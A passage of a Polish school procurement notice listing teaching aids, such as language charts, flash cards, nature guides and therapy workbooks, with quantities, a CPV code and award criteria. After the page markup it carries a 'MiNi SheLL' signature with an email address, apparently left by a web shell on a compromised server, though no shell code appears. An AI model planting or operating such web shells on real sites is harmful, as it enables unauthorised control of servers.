języka rosyjskiego	Zestaw 15 plansz w formacie B3 zawierający materiał strukturalno-gramatyczny. Tematyka plansz: Rzeczownik, Przypadki, Deklinacje rzeczownika, Odmiana rzeczowników rodzaju męskiego, Odmiana rzeczowników rodzaju żeńskiego, Odmiana rzeczowników rodzaju nijakiego, Odmiana rzeczowników żywotnych i nieżywotnych, Czasownik - koniugacje, Czasowniki dokonane i niedokonane, Czasowniki zwrotne, Przymiotnik, Odmiana przymiotników, Stosowanie przymiotników, Zaimki osobowe, Zaimki wskazujące. Plansze są gotowe do zawieszenia.	sztuka	1 31. Has & Have - odmiana czasownika	Plansza dydaktyczna przedstawiająca czasowniki być, mieć i móc. Wymiary: 70 cm x 100 cm. Wykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę.	sztuka	16 32. Karty edukacyjne:Dziecięce ubrania	Zestawy pomagają określić i poszerzyć zasób słownictwa z danego zakresu, mogą być stosowane do ćwiczeń językowych. Rozwijają również spostrzegawczość, logiczne myślenie i kojarzenie. Pomoc przeznaczona także do sortowania, klasyfikacji i nauki języków obcych.o 48 zdjęć o wym. 15 x 10 cm	sztuka	2 33. Karty edukacyjne:Ulubione zwierzęta	Karty edukacyjne: Ulubione zwierzęta. Zestawy pomagają określić i poszerzyć zasób słownictwa z danego zakresu,mogą być stosowane do ćwiczeń językowych. Rozwijają również spostrzegawczość, logiczne myślenie i kojarzenie. Pomoc przeznaczona także do sortowania, klasyfikacji i nauki języków obcych. Zdjęcia przedstawiające różne zwierzęta. o 45 zdjęć o wym. 15 x 10 cm	sztuka	2 34. Karty: Co jest źle?,	Zestawy pomagają określić i poszerzyć zasób słownictwa z danego zakresu. Zdjęcia przedstawiające sytuacje, w których jeden element nie pasuje do obrazka, np. chłopiec piszący marchewką czy bałwan nad morzem. Format A4 do samodzielnego pocięcia na 4 karty A6 każdy. W zestawie 45 zdjęć o wym. 15 x 10 cm	sztuka	2 35. Karty: Co należy do kogo?	Gra dydaktyczna- język angielski- przedstawiająca w sposób obrazkowy minimum 14 zawodów i ich atrybuty. Przykładowo co należy do lekarza? Stetoskop, lekarstwa i termometr.	sztuka	2 36. Karty: Co się zdarzyło?	14 historyjek do układania i opowiadania. Na każdą ze scen składają się 3 obrazki, które układamy zgodnie z kolejnością zdarzeń. Gra zawiera element samokontroli - pasują do siebie tylko logicznie dobrane elementy. Wymiary puzzli po złożeniu 23 x 10,5 cm	sztuka	2 37. Karty: przedmioty	Przedmioty szkolne. Zdjęcia przedstawiające ludzi, miejsca i rzeczy, które zwykle można spotkać w szkole. W zestawie 48 zdjęć o wym. 15 x 10 cm	sztuka	2 38. Karty: żywność	Zdjęcia przedstawiające różne produkty spożywcze, zarówno półprodukty jak i gotowe posiłki. W zestawie 46 zdjęć o wym. 15 x 10 cm	sztuka	2 39. Kwestionariusz diagnozy i narzędzia badawcze w terapii pedagogicznej Wersja papierowa, autorzy: Tomczak Joanna, Ziętara Renata. rok wydania: 2014, Format A4, 72 strony. Kwestionariusz diagnozy jest podzielony na 9 części, związanych z konkretnymi zaburzeniami. Każda część składa się z podpunktów, które umożliwiają dokładne rozpoznanie problemu. Części kwestionariusza dotyczą najistotniejszych zagadnień koniecznych do właściwego zdiagnozowania zaburzenia przed rozpoczęciem pracy terapeutyczno-reedukacyjnej. Do każdej części zamieszczono szczegółowy instruktaż i odpowiednie narzędzia badawcze. Poszczególne części kwestionariusza dotyczą: charakterystyki ucznia (zachowanie, koncentracja uwagi, uczciwość, stosunek do pracy i grupy), charakterystyka czynności komunikowania się (aktywność, sposób porozumiewania się, poprawność stylistyczo-gramatyczna, wady wymowy, rozumienie), słuch fonematyczny (analiza i synteza słuchowa + testy fonetyczne), czytanie (znajomość liter, analiza i synteza wzrokowa, technika i tempo czytania, rozumienie czytanego tekstu, błędy), pisanie (znajomość liter, technika, grafia, błędy i sposób pisania), sfera ruchowa (sprawność manualna, lateralizacja), percepcja wzrokowa (analiza rysunków, różnicowanie figur geometrycznych i kolorów, układanie obrazka z części, spostrzeganie podobieństw i różnic na podstawie dwóch obrazków), orientacja (schemat ciała, nazywanie kierunków i stosunków przestrzennych, ciągi zautomatyzowane), procesy myślowe (kojarzenie i pamięć).	sztuka	1 40. Leksykon zwierząt od A do Ż	W 544 stronicowym leksykonie przedstawiono charakterystyczne szczegóły, właściwości, przyzwyczajenia i miejsca występowania gadów, płazów, owadów, ptaków, ryb, ssaków i innych ważnych grup. Opisy świata zwierząt (około 1800 haseł) uzupełnia ponad 1600 wspaniałych, barwnych fotografii i szkiców. Wydanie IX.	sztuka	3 41. Loteryjka do sortowania, zwierzęta domowe i morskie	Zestaw dwóch układanek o atrakcyjnej kolorystyce. Duże obrazki przedstawiają zwierzęta morskie i ulubione domowe zwierzątka w kolorowej scenerii. Zawartość: 2 duże obrazki z tworzywa, 16 małych tafelków, drewniana rama planszy o wymiarach 40 x 28 cm	sztuka	12 42. Loteryjka do sortowania, zwierzęta leśne i gospodarskie	Zestaw dwóch układanek o atrakcyjnej kolorystyce. Układanka, w której do dużych obrazków przedstawiających las i gospodarstwo wiejskie należy dopasować zwierzęta żyjące w jednym i drugim środowisku. Zawartość:2 duże obrazki z tworzywa, 16 małych tafelkówdrewniana rama planszy o wymiarach 40 x 28 cm	sztuka	12 43. Lotto dźwiękowe po angielsku - emocje	Loteryjka zachęcająca dzieci do dobierania wyrazu twarzy do usłyszanych emocji wyrażonych w zdaniu w języku angielskim. W skład wchodzi 8 plansz o wym. 21 x 14 cm, 120 żetonów, CD	sztuka	2 44. Lupa	Lupa z kolorową rączką o dużym powiększeniu 4,5x. Średnica plastikowej soczewki wynosi ponad 11 cm.	sztuka	24 45. Mały atlas anatomiczny	Przedstawia anatomię człowieka w sposób przystępny, usystematyzowany, zawiera barwne tablice wraz z tekstami objaśniającymi.	sztuka	15 46. Mapa topograficzna okolic szkoły i regionu+plany Biała Podlaska i okolice - mapa turystyczna, wymiary min. 12 x21 cm	sztuka	15 47. Mapa:Basic Facts about USA Fakty o USA Nazwa: Basic Facts about USA Fakty o USARozmiar: 160 cm x 120 cm plansza dwustronna, laminowana, oprawiona w drewniane wałki z zawieszką w języku angielskim	sztuka	2 48. Mata edukacyjna ,,Animal Alphabet"	Rok wydania: 2014, Oprawa: tuba kartonowa 11 x 110 cm, Format: 210 x 360 cmSeria: Maty edukacyjne do angielskiego, Poziom: 4-10 lat	sztuka	2 49. Metoda 18 struktur wyrazowych w pracy z dziećmi z trudnościami... (komplet 9 zeszytów) Ćwiczenia pisemne zawarto w 9 zeszytach 32-kartkowych, w których połączono po dwie struktury wyrazowe. Każdy zeszyt ćwiczeń zawiera odrębny zestaw tzw. suwaków i wprawek, w skład których wchodzą wyrazy o określonej strukturze: od najprostszej w części I do najbardziej złożonych w częściach ostatnich. Materiał pisemny poprzedzony jest graficznym schematem budowy omawianych wyrazów.	sztuka	4 50. Młody mistrz programowania. Języki BALTIE I SCRATCH dla dzieci	Autorzy: Agnieszka Borkowska, Paweł Borkowski, rok wydania: 2016. Podręcznik nauki najmłodszych programowania w językach BALTIE i SCRATCH	sztuka	24 51. Moje sylabki 1	Autorzy: Agnieszka Fabisiak-Majcher, Elżbieta Ławczys. Zestaw zawiera: samogłoski; wyrażenia dźwiękonaśladowcze; pierwsze sylaby otwarte ze spółgłoskami: p, m, b, l, f, w, t, d; wyrazy do czytania globalnego; zestawy - samogłoska + sylaba otwarta; wyrazy dwusylabowe zbudowane z sylab otwartych; zadania i proste teksty. W zestawie: teczka: A4, 64 karty, broszura z opisem metody i poleceniami do ćwiczeń.	sztuka	4 52. Moje sylabki 2	Autorzy: Agnieszka Fabisiak-Majcher, Elżbieta Ławczys. Zestaw zawiera: sylaby otwarte ze spółgłoskami: s, z, k, g, j, n; zestawy - samogłoska + sylaba otwarta; wyrazy do czytania globalnego; wyrazy dwusylabowe zbudowane z sylab otwartych; zdania i proste teksty. W zestawie: teczka A4, 37 kart, broszura z opisem metody i poleceniami do ćwiczeń.	sztuka	4 53. Moje sylabki 3	Autorzy: Agnieszka Fabisiak-Majcher, Elżbieta Ławczys . Zestaw zawiera: sylaby otwarte i zamknięte ze spółgłoskami p, m, b, l, t, d, f, w, s, z, k, g, j, n; wyrazy czytane globalnie; pseudowyrazy zbudowane z sylab otwartych i zamkniętych; zdania i teksty. W zestawie: teczka: A4, 58 kart, broszura z opisem metody i poleceniami do ćwiczeń.	sztuka	4 54. Moje sylabki 4	Autorzy: Agnieszka Fabisiak-Majcher, Elżbieta Ławczys . Zestaw zawiera: sylaby otwarte i zamknięte ze spółgłoskami sz, ż, rz, ch, h, ł, c, dz, cz, dż; krótkie wyrazy jednosylabowe; wyrazy czytane globalnie; pseudowyrazy zbudowane z sylab otwartych i zamkniętych; teksty, krzyżówki sylabowe. Zestaw zawiera: teczka A4, 52 karty, broszura z opisem metody i poleceniami do ćwiczeń.	sztuka	4 55. Ortograffiti. Gry matematyczne	W skład zestawu wchodzą gry: Która godzina? (48 kart, 40 żetonów, zegar z ruchomymi wskazówkami), Szybkie oczko (plansza oraz 84 kartoniki), Gry karciane (80 kart), Loteryjka (8 plansz oraz 72 kartoniki), Znajdź mnie (plansza oraz 40 kartoników), Tabliczka mnożenia (plansza oraz karty do wypełniania), 4 pionki, 2 kostki tradycyjne, kostka z liczbami dwucyfrowymi.	sztuka	12 56. Ortograffiti. Matematyka bez trudności. Komplet W zestawie znajdują się dwa zeszyty ćwiczeń: Matematyka bez trudności. Część pierwsza i Matematyka bez trudności. Część druga. 12 57. Ortograffiti. Poziom drugi. Komplet 4 zeszytów W zestawie znajdują się 4 zeszyty ćwiczeń z poziomu drugiego, adresowanego do uczniów klas V-VI: ORTOGRAFFITI ó-U, ORTOGRAFFITI RZ-Ż,ORTOGRAFFITI CH-H, ORTOGRAFFITI MIKS. Do pierwszego zeszytu dołączono kolorową nakładkę do czytania.	sztuka	12 58. Plansza edukacyjna ,,Segregacja odpadów"	Plansza pokazuje podział odpadów, symbole i znaki ekologiczne, czas biodegradacji odpadów. Wymiary: 70x100 cm, dwustronnie foliowana z zawieszką.	sztuka	3 59. Plansza edukacyjna-Ptaki żyjące w Polsce	Plansza ptaki odlatujące na zimę ptaki pozostające na zimę. Dzięki tej planszy dzieci mogą nie tylko poznać wygląd różnych, mniej i bardziej popularnych, ptaków (np. wilgi, czajki, sikorki zimorodka czy bataliona), ale także dowiedzieć się, które gatunki zostają na zimę w Polce, które odlatują do ciepłych krajów, a także które do nas przylatują. Format: 100.0x50.0	sztuka	3 60. Plansza: Animals: Wild/farm/pets	Plansza naścienna. Rozmiar planszy: 100 x70 cm, krawędź górna i dolna wykończone są stalowymi wzmocnieniami. Plansza obustronnie foliowana.	sztuka	2 61. Plansza: Animals: Wild/farm/pets	Zwierzęta w języku angielskim wraz z tłumaczeniem i rysunkiem, podzielone na trzy grupy: WILD, FARM, PETS. Druk wielobarwny Rozmiar planszy po rozwinięciu: 70 cm x 100 cm. Oprawa : 2 cienkie metalowe listwy - górna z zawieszką.	sztuka	2 62. Plansza: kolory	Kolorowa plansza służy wprowadzaniu i utrwalaniu nowych słówek tematycznych w języku angielskim. Stanowi ona estetyczną dekorację klasy, stwarzając codzienną okazję do powtarzania znaczenia i pisowni angielskich wyrazów. Na odwrocie planszy znajdują się karty pracy do kopiowania. Wym. 43 x 55 cm	sztuka	2 63. Plansza: Be, have got, can & pronouns	Plansza dydaktyczna przedstawiająca czasowniki być, mieć i móc. Wymiary: 70 cm x 100 cm. Wykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę.	sztuka	2 64. Plansza: Family & garden	Plansza dydaktyczna, która przedstawia dużą ilustrację rodziny w ogrodzie. Na planszy wypisane są słówka w języku angielskim związane z rodziną, ogrodem i kolory. Wymiary:70 cm x 100 cm. Wykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę. 2 65. Plansza: home	Plansza dydaktyczna, która przedstawia ilustrację domu. Wypisane są na niej nazwy pomieszczeń i elementów konstrukcji domu w języku angielskim oraz liczby i przyimki lokalizacyjne. Wymiary: 70 cm x 100 cm. Wykonanie:Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę.	sztuka	2 66. Plansza: nouns	Ta plansza dydaktyczna w jasny i prosty sposób przedstawia rzeczowniki angielskie z podziałem na policzalne i niepoliczalne. Wymiary:70 cm x 100 cmWykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę	sztuka	2 67. Plansza: Numbers, what time is it?,	Plansza dydaktyczna, która przedstawia liczby w języku angielskim, dni tygodnia, miesiące oraz godziny. Wymiary:70 cm x 100 cm. Wykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę	sztuka	2 68. Plansza: The tenses - past & future	Plansza dydaktyczna, która przedstawia przykłady zastosowania angielskich czasów przeszłych i czasu przyszłego (Past Simple, Past Continuous, Past Perfect, Future Simple). Wymiary: 70 cm x 100 cm. Wykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę.	sztuka	2 69. Plansza: The tenses - present	Plansza dydaktyczna, która przedstawia przykłady zastosowania angielskich czasów teraźniejszych (Present Simple, Present Continuous, Present Perfect, Present Perfect Continuous). Wymiary: 70 cm x 100 cm. Wykonanie: Papier kredowy o gramaturze 250 g. Ofoliowana, wyposażona w listwy metalowe i zawieszkę.	sztuka	2 70. Plansze edukacyjne-Rośliny chronione w Polsce	Ścienna plansza szkolna z cyklu bioróżnorodność Polski, przedstawiająca 21 gatunków roślin chronionych. Każdy z gatunków pokazany jest na ilustracji oraz opatrzony opisem. Format: 90 x 120 cm, Oprawa w drewniane półwałki z zawieszeniem sznurkowym, laminowana dwustronnie folią strukturalną o podwyższonej wytrzymałości na rozdzieranie. 5 lat gwarancji na trwałość oprawy i folii.	sztuka	3 71. Podręcznik do języka rosyjskiego stupieni klasa 5	STUPIENI. JĘZYK ROSYJSKI. KLASA 5. (Z CD AUDIO). Beata Gawęcka-Ajchel, Anna Żelezik. Podręcznik Stupieni 5 składa się z 8 rozdziałów (???????) i ma na celu kształtowanie kompetencji leksykalno-gramatycznych, wyrabianie techniki poprawnego czytania, umiejętności słuchania ze zrozumieniem, sprawności mówienia i pisania. Każdy rozdział rozpoczyna się tematycznym, ilustrowanym słowniczkiem.	sztuka	16 72. Podręcznik do nauki j. Rosyjskiego stupieni klasa 4	STUPIENI. Język rosyjski. Beata Gawęcka-Ajchel, Anna Żelezik. Podręcznik z ćwiczeniamiPodręcznik obejmuje trzynaście rozdziałów. Wszystkie rozdziały zawierają zagadnienia artykulacyjno-graficzne, leksykalne i uwzględniają problemy gramatyczne pojawiające się w tekstach. Oprawa miękka, rok wydania: 2017	sztuka	16 73. Pomoce do poznawania owadów-Owady stemple	Komplet drewnianych stempelków w kartonie. Poduszeczka w komplecie. 20 szt. śr. 2 cm	sztuka	3 74. Przewodnik do rozpoznawania drzew Książka zawiera szczegółowe informacje i zdjęcia min. 300 gatunków drzew i ponad 50 gatunków krzewów rosnących w Polsce i w Europie Środkowej, zarówno rodzimych jak ii przywiezionych w nasze strony z obcych kontynentów. Oprawa kartonowa z obwolutą PCV, zalecany format: 13,0 x 1 9,4 cm	sztuka	5 75. Przewodnik do rozpoznawania po 8sztuk :gwiazd, drzew, ptaków, zwierząt, motyli, owadów, grzybów	Przewodnik zawiera opisy (min. 50), rysunki lub zdjęcia gwiazdozbiorów, gwiazd, galaktyk, planet układu słonecznego i ich księżyców oraz informacje o meteorytach i rojach meteorytów. Zalecany format: 13 x 19 cm, oprawa kartonowa ze skrzydełkami.Przewodnik zawiera opisy, rysunki lub zdjęcia (min.50) często spotykanych gatunków drzew rosnących w polskich lasach, parkach i ogrodach. Zalecany format: 13 x 19,3 cm, oprawa miękka ze skrzydełkami.Przewodnik zawiera opisy, rysunki lub zdjęcia (min. 50) często spotykanych gatunków ptaków w Polsce. Zalecany format: 13 x 19,3 cm, oprawa miękka ze skrzydełkami.Przewodnik zawiera opisy, rysunki lub zdjęcia (min. 50) często spotykanych gatunków zwierząt w Polsce. Zalecany format: 13 x 19,3 cm, oprawa miękka ze skrzydełkami.Przewodnik zawiera opisy, rysunki lub zdjęcia (min. 50) często spotykanych gatunków motyli w Polsce. W książce motyle pogrupowano według barwy wierzchu ich skrzydeł. Zalecany format: 13,2 x 19,3 cm, oprawa kartonowa z obwolutą PCV.Przewodnik zawiera opisy, rysunki lub zdjęcia (min. 50) często spotykanych gatunków owadów w Polsce. Zalecany format: 13,2 cm x 19,3 cm, liczba stron: 64, oprawa kartonowa z obwolutą PCV.Przewodnik zawiera opisy, rysunki lub zdjęcia (min. 50 ) często spotykanych gatunków grzybów w Polsce. Zalecany format: 13 x 19,3 cm, oprawa miękka ze skrzydełkami.	sztuka	56 76. Przewodnik rośliny i zwierzęta	Przewodnik przedstawia opisy i zdjęcia min 1000 gatunków zwierząt i roślin. Krótkie i zwięzłe opisy oprócz podstawowych informacji o wyglądzie zwierzęcia lub rośliny zawierają także trochę ciekawostek przyrodniczych. Zalecany format: 11 x 18 cm, oprawa kartonowa	sztuka	5 77. Przewodnik rośliny i zwierzęta	Przewodnik przedstawia opisy i zdjęcia min 1000 gatunków zwierząt i roślin. Krótkie i zwięzłe opisy oprócz podstawowych informacji o wyglądzie zwierzęcia lub rośliny zawierają także trochę ciekawostek przyrodniczych. Zalecany format: 11 x 18 cm, oprawa kartonowa	sztuka	5 78. Przewodnik-las	Przewodnik zawiera opisy min. 450 gatunków roślin, grzybów, zwierząt oraz ich zdjęcia. Zalecany format: 13 x 19 cm, oprawa: kartonowa z obwolutą PCV. Zalecany format wynika z możliwości łatwego korzystania z przewodnika w terenie	sztuka	5 79. Przyroda Plus- ćwiczenia rozwijające zainteresowania przyrodnicze	Ćwiczenia rozwijające zainteresowania przyrodniczeAutorzy: Agata Kornega, Anna ŚliwaSeria: Rozwijanie zainteresowań przyrodniczych,,Przyroda PLUS" to cykl trzech zeszytów rozwijających zainteresowania przyrodnicze dzieci w wieku 6-9 lat.	sztuka	64 80. Puzzle angielskie liczba mnoga i pojedyncza	Zestaw 27 puzzli służy do łączenia odpowiednich słówek w liczbie pojedynczej i mnogiej. Dziecko poprawia słownictwo i czytanie słówek w języku angielskim. W zestawie: 54 elementy o wym. 5,5 x 9,5 cm	sztuka	2 81. Puzzle angielskie przeciwieństwa	Zestaw 27 puzzli, służy do łączenia słów o przeciwnych znaczeniach. Przy ich użyciu dziecko polepsza swoje słownictwo i czytanie słówek w języku angielskim. W zestawie 54 elementy w rozm. 5,5 x 9,5 cm	sztuka	2 82. Rzeczowniki po angielsku-zdjęcia	Zestaw zawiera: 108 fotografii o wym. 7 x 7 cm, 108 podpisów o wym. 7 x 3 cm, instrukcję	sztuka	16 83. Scrabble orginal (wersja niemiecka)	Zawartość: plansza do gry, 102 płytki z literami, 4 podstawki, woreczek, instrukcja.	sztuka	1 84. Scratch. Komiksowa przygoda z programowaniem Autor: The LEAD Project, rok wydania: 2017. Wstęp do programowania dla najmłodszych.Dzięki tej książce dziecko: pozna środowisko Scratcha oraz zasady tworzenia programów,dowie się, co to są zmienne, podprogramy, pętle i instrukcje warunkowe,nauczy się tworzyć algorytmy, stworzy niejedną grę.	sztuka	16 85. Słowniczek frazeologiczny	Słowniczek 1 - frazeologiczny dla dzieci. Liczba stron: 32, Format: 16,8 x 23,5 cm, Rok wydania: 2010.	sztuka	4 86. Słowniczek ortograficzny	Słowniczek 4 - ortograficzny dla dzieci. Autor: Chromiak Małgorzata, Format: 16,8 x 23,5 cm, Rok wydania: 2012	sztuka	4 87. Słowniczek wyrazów bliskoznacznych Słowniczek 2 - wyrazów obcych dla dzieci. Liczba stron: 32, Format: 16,8 x 23,5 cm, Rok wydania: 2011	sztuka	4 88. Słowniczek wyrazów obcych	Ilustrowany słownik wyrazów obcych - wersja dla dzieci.Liczba stron: 32, Format: 16,8 x 23,5 cm, Rok wydania: 2010	sztuka	4 89. Szachy dla dzieci. Część 1. Podstawy gry	autor: Mirosława Litmanowicz, Szachy dla dzieci Część 1 Podstawy gry Oprawa miękka, Liczba stron: 132	sztuka	8 90. Szachy dla dzieci. Część 2.	Mirosława Litmanowicz, Szachy dla dzieci Część 2, Oprawa miękka, Liczba stron: 132	sztuka	8 91. Szachy dla dzieci. Część 3.	Mirosława Litmanowicz, Szachy dla dzieci Część 3, Oprawa miękka, Liczba stron: 212	sztuka	8 92. Szczęśliwe buzie - karty do nauki czasowników	Czynności i czasowniki - język angielski. Zestaw zaopatrzono w praktyczny pojemnik do przechowywania tabliczek i ich segregacji. W zestawie: 108 zdjęć przedstawiających konkretne czynności oraz 108 nazw wykonywanych czynności. Karty są wykonane z wysokiej jakości, laminowanego kartonu o grubości 2,5 mm. Zdjęcia o wym.: 7 x 7cm, kartoniki z nazwami o wym.: 7 x 3 cm.	sztuka	2 93. Tablice do języka rosyjskiego 133	Jest to pomoc dydaktyczna przeznaczona do nauki języka rosyjskiego w szkole podstawowej i gimnazjum. Zestaw szkolny zawiera 29 tablic formatu B3 z literami oraz 1 tablicę przedstawiającą cały alfabet. Każda tablica zawiera obraz wyrazu podstawowego, wyraz podstawowy, podział wyrazu na sylaby z zaznaczeniem samogłoski akcentowanej, wzory liter pisanych i drukowanych (małych i dużych) oraz niezbędne uwagi dotyczące pisowni lub wymowy.	sztuka	1 94. Terapia dysleksji. Koordynacja wzrokowo-ruchowa. Koncentracja uwagi. Orientacja przestrzenna. Ćwiczenia do zajęć korekcyjno-kompensacyjnych autor: Sosin Irena. Pakiet zawiera ćwiczenia i karty pracy z obszarów zaburzeń koncentracji uwagi, koordynacji wzrokowo-ruchowej i orientacji przestrzennej. Zeszyty stanowią narzędzie do wykorzystania w treningu zaburzeń koncentracji uwagi, koordynacji wzrokowo-słuchowej oraz orientacji przestrzennej uczniów ze specyficznymi trudnościami w uczeniu się ze szczególnym uwzględnieniem uczniów z dysleksją rozwojową. Publikacja zawiera: karty pracy oraz ćwiczenia.	sztuka	1 95. Układanka schubitrix - adjektive :gegensatze Układanka Schubitrix - Adjektive: Gegensatze. Zestaw zawiera 2 układanki o różnych zagadnieniach językowych:1. łatwe: voll - leer, dick - dunn, hart - weich ...2. trudne: alt - neu/alt - jung, hoch - tief/hoch - niedrig ...Zawartość: 2 układanki po 18-24 elementy każda, trójkątne elementy o boku 6 cm wykonane z trwałego kartonu, pudełko z wkładką do sortowania.	sztuka	4 96. Warsztat specjalisty terapii pedagogicznej - przewodnik Warsztat specjalisty terapii pedagogicznej- przewodnik z plytą CD. Izabela Mańkowska, Małgorzata Rożyńska.Pozycja książkowa zaktualizowana do nowych rozporządzeń, uzupełnioną o nową wiedzę, nowe pomysły i rozwiązania praktyczne.	sztuka	1 .......................................................... <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162100-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 45<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com